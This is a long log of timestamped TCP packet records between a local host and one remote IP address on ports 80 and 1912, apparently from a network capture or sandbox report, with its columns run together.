                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.693825006 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.693872929 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.695538998 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.695707083 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.695745945 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.697384119 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.697493076 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.697628975 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.699351072 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.699362993 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.699419022 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.701065063 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.746767044 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.816293955 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.816323996 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.816421986 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.816848993 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.816916943 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.818577051 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.818598032 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.818711042 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.818711042 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.820154905 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.820168018 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.820358038 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.821755886 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.821768999 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.821845055 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.823257923 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.823368073 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.824771881 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.824827909 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.824898958 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.824947119 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.826361895 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.826445103 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.827218056 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.827893972 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.827963114 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.829471111 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.829535007 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.829641104 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.829641104 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.830974102 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.830986023 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.831047058 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.832534075 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.832645893 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.832704067 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.834074974 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.834281921 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.835401058 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.835634947 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.835694075 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.837476969 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.837551117 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.837738991 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.837738991 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.839049101 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.839116096 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.839174032 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.840476036 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.840678930 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.842206955 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.842277050 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.842303991 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.842343092 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.843408108 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.843425035 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.843485117 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.844902039 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.844922066 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.845304012 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.846465111 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.846483946 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.846550941 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.847944975 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.848176956 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.848237038 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.849447012 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.849567890 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.851058006 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.851121902 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.851337910 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.852716923 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.852735996 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.853055954 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.853055954 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.854163885 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.854228973 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.854362965 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.855703115 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.855906963 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.855983973 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.857217073 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.857342958 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.858782053 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.858855963 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.858891010 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.858891010 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.860315084 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.860455036 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.861869097 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.861996889 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.862041950 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.862085104 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.863404036 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.863652945 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.863698006 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.864950895 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.865071058 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.866595984 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.866642952 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.866671085 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.866772890 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.868014097 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.868185997 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.868241072 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.869683027 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.869703054 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.869941950 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.870367050 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.871166945 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.871196985 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.871527910 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.872838020 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.872858047 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.872917891 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.874291897 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.874313116 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.874387026 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.875765085 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.875874043 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.875978947 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.877322912 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.877477884 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.877522945 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.878833055 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.879049063 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.879110098 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.880350113 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.880580902 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.880873919 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.881867886 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.882003069 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.882134914 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.883436918 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.883538008 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.883716106 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.884968042 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.885106087 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.885391951 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.886868000 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.886888027 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.886949062 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.888044119 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.888097048 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.888386011 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.889681101 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.889718056 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.889774084 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.891175032 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.891355991 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.891457081 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.892781973 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.892860889 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.892860889 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:51.012613058 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:51.259593010 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:51.379441977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:51.379668951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:51.379668951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:51.499495029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.385051966 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.504911900 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.505027056 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.514333963 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.634059906 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717629910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717808008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717818975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717829943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717879057 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717946053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717952013 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717967033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717978954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.718019962 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.718061924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.718105078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.718112946 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.718116999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.718168020 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.837873936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.837997913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.838121891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.841959953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.842012882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.842149019 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.910168886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.910240889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.910424948 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.912570953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.912616014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.912684917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.921149015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.921339035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.921480894 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.929517984 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.929651976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.929877996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.937803030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.937928915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.938100100 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.946279049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.946338892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.946508884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.954653025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.954742908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.954915047 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.963058949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.963196039 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.963360071 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.971574068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.971626043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.971777916 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.979906082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.979999065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.980137110 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.987822056 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.988003969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.988176107 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.995697975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.995732069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.995901108 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.030210972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.074702978 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.102612019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.102674007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.102885008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.104917049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.105050087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.105160952 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.109738111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.109812021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.109918118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.114295006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.114377975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.114485025 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.118913889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.118928909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.119071007 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.123562098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.123677015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.123785019 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.128257990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.128343105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.128453016 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.132745981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.132850885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.132966995 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.137187958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.137279034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.137397051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.141745090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.141793013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.141904116 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.146173000 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.146274090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.146382093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.150640965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.150763035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.150871038 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.155179024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.155237913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.155344963 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:53.159688950 CET8049723185.81.68.147192.168.2.10
